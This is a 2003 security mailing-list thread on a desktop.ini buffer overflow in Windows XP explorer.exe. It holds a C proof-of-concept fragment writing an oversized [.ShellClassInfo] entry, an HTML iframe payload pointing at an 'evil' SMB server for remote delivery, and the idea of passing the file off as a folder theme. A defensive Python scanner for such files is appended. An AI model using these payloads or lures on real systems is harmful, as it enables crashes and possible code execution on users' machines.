Re: Buffer overflow in Explorer.exe

From: Berend-Jan Wever (SkyLined_at_edup.tudelft.nl)
Date: 05/11/03

    To: <vuln-dev@securityfocus.com>
    Date: Sun, 11 May 2003 19:55:46 +0200
    
    

    Could this not be done remotely, without user interaction except browsing an
    evil website, by using SMB?
    <HTML><BODY>
      <IFRAME src="\\my-evil-server\">
    </BODY></HTML>
    You can make IE browse a hard disk whose contents you control...

    I don't have XP so I can't test this. Let me know what you find.

    Cheers,

    Berend-Jan Wever

    ----- Original Message -----
    From: "Kristopher Matthews" <krism@mailsnare.net>
    To: "'Ryan Yagatich'" <ryany@pantek.com>
    Cc: <vuln-dev@securityfocus.com>
    Sent: Friday, May 09, 2003 18:42
    Subject: RE: Buffer overflow in Explorer.exe

    I have tested and duplicated this behavior on a fully patched/updated
    Windows XP Pro system.

    1. The overflow is for that particular key, AFAICT.
    1a. It will not work for the root (c:/) directory; explorer.exe does not
    parse 'desktop.ini' for that directory. It will, however, work for any other
    directory.
    2. It crashes explorer.exe (which runs the task bar/start menu, etc) - It
    looks for all the world like a standard buffer overflow; I believe a more
    carefully crafted 'desktop.ini' file could be cause for explorer.exe to
    unintentionally execute arbitrary code.
    3. Download and execute untrusted code? Combine this with any of the other
    popular exploits for windows; also, it wouldn't be terribly hard to get a
    user to download a 'desktop.ini' file to their "My Documents" directory (in
    the guise of, say, a folder theme, which windows does support; e.g.
    different background, file layout, etc); bam, whenever they open that
    directory, explorer crashes.

    Regards,
    Kristopher

    -----Original Message-----
    From: Ryan Yagatich [mailto:ryany@pantek.com]
    Sent: Thursday, May 08, 2003 6:28 PM
    To: at4r@3wdesign.es
    Cc: vuln-dev@securityfocus.com

    Hi,
    I don't quite understand the purpose behind this code. It creates
    a read only file '/aT4r[at]3WDesign.es Security/desktop.ini' with the
    contents of

    [.ShellClassInfo]
    AAAAAAAAAAAA {x2301}

    And then terminates? I don't have a windows machine available to
    really explore this any, but what makes that entry in desktop.ini cause
    this? Furthermore, is this issue only for that particular key or is it
    generally just key/excessive parameter/missing value size that is
    affected? And additionally, you mention that explorer will no longer be
    able to operate when trying to browse the hard disk, but does this mean
    globally, or when they try to browse the c:/ drive, or just that
    particular folder?
    Please send me more information about this, (even if it references
    past posts that I have missed) so that I can better understand the
    severity of this. Especially since to me, I still see it as someone needing
    to download and execute untrusted software which causes a system crash,
    and if that were going to happen there are far worse things that can be
    done besides creating a small text file.

    Thanks,
    Ryan Yagatich

    ,_____________________________________________________,
    \ Ryan Yagatich support@pantek.com \
    / Pantek Incorporated (877) LINUX-FIX /
    \ http://www.pantek.com/security (440) 519-1802 \
    / Are your networks secure? Are you certain? /
    \___E8354282324E636DB5FF7B8A6EDED51FD02C06C68D3DB695___\

    On Wed, 7 May 2003, aT4r InsaN3 wrote:

    >This bug allows a malicious attacker to execute data with privileges of a
    >user that is browsing the hard disk with explorer.
    >
    >tested against winxp SP1
    >
    >example code provided.
    >
    <snip>
    >
    > strcpy(path,"\\aT4r[at]3WDesign.es Security");
    > mkdir(path);
    > SetFileAttributes(path,FILE_ATTRIBUTE_READONLY);
    >
    > strcat(path,"\\desktop.ini");
    > bof=fopen(path,"w");
    > fputs("[.ShellClassInfo]\n",bof);
    > memset(evil,'A',BUFF);
    > fputs(evil,bof);
    > fclose(bof);
    <snip>

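    Added here as a worked example, not code from the thread or from any of its posters: a small hunt script for the file shape the PoC above writes, a desktop.ini whose [.ShellClassInfo] section holds a bare, oversized run of bytes instead of key=value entries. The 256-byte threshold, the folder names and both sample file contents are assumptions made for illustration; the thread never states the size of BUFF, so the threshold is only a heuristic for "longer than any legitimate IconResource or InfoTip line".

```python
# Added example (not code from the thread): hunt for desktop.ini files whose
# [.ShellClassInfo] section carries the malformed, oversized entry the posted
# PoC writes. Paths, the threshold and the sample contents are assumptions.
import codecs
import os
import re
import tempfile
from dataclasses import dataclass
from typing import Dict, Iterator, List

SECTION_RE = re.compile(r"^\s*\[(?P<name>[^\]]+)\]\s*$")

# Assumed threshold: the thread never states BUFF (the size of the 'A' run
# that crashes explorer.exe), so anything past what a legitimate
# folder-customisation line needs is treated as suspicious.
DEFAULT_MAX_LEN = 256


@dataclass
class Finding:
    line_no: int
    reason: str
    excerpt: str


def scan_desktop_ini(text: str, max_len: int = DEFAULT_MAX_LEN) -> List[Finding]:
    """Return findings for entries under [.ShellClassInfo] that look malformed."""
    findings: List[Finding] = []
    section = None
    for no, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        m = SECTION_RE.match(line)
        if m:
            section = m.group("name").lower()
            continue
        if section != ".shellclassinfo":
            continue
        excerpt = line[:32] + ("..." if len(line) > 32 else "")
        if "=" not in line:
            # The PoC writes a bare run of bytes with no key=value form.
            findings.append(Finding(no, "entry without '=' separator", excerpt))
        if len(line) > max_len:
            findings.append(Finding(no, f"entry longer than {max_len} bytes", excerpt))
    return findings


def read_ini_text(path: str) -> str:
    """Explorer writes desktop.ini as ANSI or as UTF-16 with a BOM; handle both."""
    with open(path, "rb") as fh:
        data = fh.read()
    if data.startswith((codecs.BOM_UTF16_LE, codecs.BOM_UTF16_BE)):
        return data.decode("utf-16")
    return data.decode("latin-1")


def iter_desktop_ini(root: str) -> Iterator[str]:
    """Yield every desktop.ini below root (case-insensitive, as on NTFS)."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower() == "desktop.ini":
                yield os.path.join(dirpath, name)


def scan_tree(root: str, max_len: int = DEFAULT_MAX_LEN) -> Dict[str, List[Finding]]:
    """Map each suspicious desktop.ini path under root to its findings."""
    results: Dict[str, List[Finding]] = {}
    for path in iter_desktop_ini(root):
        found = scan_desktop_ini(read_ini_text(path), max_len)
        if found:
            results[path] = found
    return results


# Constructed samples: a normal folder-customisation file, and one shaped
# like the thread's PoC ([.ShellClassInfo] followed by a long run of 'A').
BENIGN_INI = (
    "[.ShellClassInfo]\r\n"
    "IconResource=C:\\Windows\\System32\\SHELL32.dll,3\r\n"
    "ConfirmFileOp=0\r\n"
    "[ViewState]\r\n"
    "FolderType=Documents\r\n"
)
POC_SHAPED_INI = "[.ShellClassInfo]\n" + "A" * 1024 + "\n"


def demo() -> Dict[str, int]:
    """Write both samples into a temp tree and return finding counts per folder."""
    with tempfile.TemporaryDirectory() as root:
        for folder, body in (("Benign", BENIGN_INI), ("Evil Theme", POC_SHAPED_INI)):
            os.makedirs(os.path.join(root, folder))
            with open(os.path.join(root, folder, "desktop.ini"), "w", newline="") as fh:
                fh.write(body)
        hits = scan_tree(root)
        return {os.path.basename(os.path.dirname(p)): len(f) for p, f in hits.items()}


if __name__ == "__main__":
    for folder, count in demo().items():
        print(f"{folder}: {count} finding(s)")
```

    Pointed at a user profile (`scan_tree(r"C:\Documents and Settings")`) it lists only files that would trip the check, so the benign customisation files Windows itself writes stay quiet. Any hit is worth a look regardless of the threshold, because a legitimate [.ShellClassInfo] entry is always key=value.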
